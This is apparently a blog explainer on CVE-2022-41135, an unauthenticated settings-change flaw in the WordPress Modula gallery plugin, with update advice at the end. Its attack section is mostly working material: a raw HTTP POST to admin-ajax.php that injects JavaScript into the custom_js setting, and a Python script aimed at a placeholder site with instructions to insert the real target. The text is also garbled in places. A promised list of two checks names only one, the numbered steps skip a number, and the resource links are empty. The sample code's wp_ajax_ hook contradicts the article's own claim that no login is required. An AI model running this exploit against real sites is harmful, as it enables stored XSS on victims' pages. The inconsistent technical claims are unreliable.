---
WordPress is one of the world’s most popular content management systems, but its wide use makes it a prime target for cyberattacks. If you use the Modula plugin (a gallery plugin for images and videos), you need to know about CVE-2022-41135—a critical vulnerability that lets unauthenticated attackers (anyone, including those not logged in) mess with your plugin settings.
This article explains the vulnerability in simple language, shows you relevant code, explains how an attack works, and gives you resources to stay safe.
What’s CVE-2022-41135?
CVE-2022-41135 is a security hole in Modula plugin versions up to and including 2.6.9 for WordPress. Because of insufficient security checks (like missing capability or nonce validations), anyone on the web can send a request to your WordPress site and change settings in the Modula plugin. That means a stranger could tweak your photo galleries, inject malicious code, or assist bigger attacks on your website.
- Affected Plugin: Modula <= 2.6.9
Requires Login: NO (anyone on the internet can do this)
- CVE Reference: NVD - CVE-2022-41135
- Public Advisory: Patchstack Security Advisory
What Went Wrong in the Code?
Normally, WordPress plugins protect sensitive admin features (like changing settings) with two things:
Nonce (a secure key to prevent cross-site request forgery)
In vulnerable versions, Modula’s settings change handler (modula_settings_save_ajax_handler) didn't do enough checks. Here’s a simplified version of what happened:
// Vulnerable code snippet (simplified illustration)
add_action('wp_ajax_modula_save_main_settings', 'modula_settings_save_ajax_handler');
function modula_settings_save_ajax_handler() {
// ...No user permission checks...
$settings = array();
if ( isset($_POST['settings']) ) {
$settings = $_POST['settings'];
}
update_option('modula_main_settings', $settings);
wp_send_json_success();
}
This function simply accepts POST data and saves it as plugin settings. No verification if the sender is an admin—or even logged in! That’s a big oversight.
1. Send a POST Request
An attacker sends a POST request straight to your site’s AJAX endpoint, which unauthenticated users can access:
POST /wp-admin/admin-ajax.php?action=modula_save_main_settings HTTP/1.1
Host: <victim-site>
Content-Type: application/x-www-form-urlencoded
settings[custom_js]=alert('Hacked!')
The attacker is now able to change the plugin’s settings to any value.
- With options like custom_js, this could mean putting in actual JavaScript code, leading to stored XSS attacks or site disruptions.
3. No Login Needed!
Because of missing checks, the attacker doesn’t need to log in. Anyone can run this attack from a browser or a simple script.
Here’s a Python example showing how easy this attack can be
import requests
url = "https://target-site.com/wp-admin/admin-ajax.php";
data = {
'action': 'modula_save_main_settings',
'settings[custom_js]': "alert('Hacked by CVE-2022-41135');"
}
resp = requests.post(url, data=data)
print("Server response:", resp.text)
Replace https://target-site.com with the target’s actual site address.
Update NOW!
The Modula team fixed this bug in version 2.6.10. Update the plugin today.
Scan Your Site
Tools like Patchstack, Wordfence, or WPScan can help check for exploited plugins.
Official WordPress Plugin:
CVE Entry:
Security Advisory:
Developer Fix:
WPScan Details:
In Summary
CVE-2022-41135 is a real threat for any WordPress site running an old version of Modula. The attack is simple, fix is easy (just upgrade!), and the danger is high. Make sure your site and plugins are always kept up-to-date to avoid being hacked in the future.
Timeline
Published on: 11/18/2022 23:15:00 UTC
Last modified on: 11/23/2022 19:37:00 UTC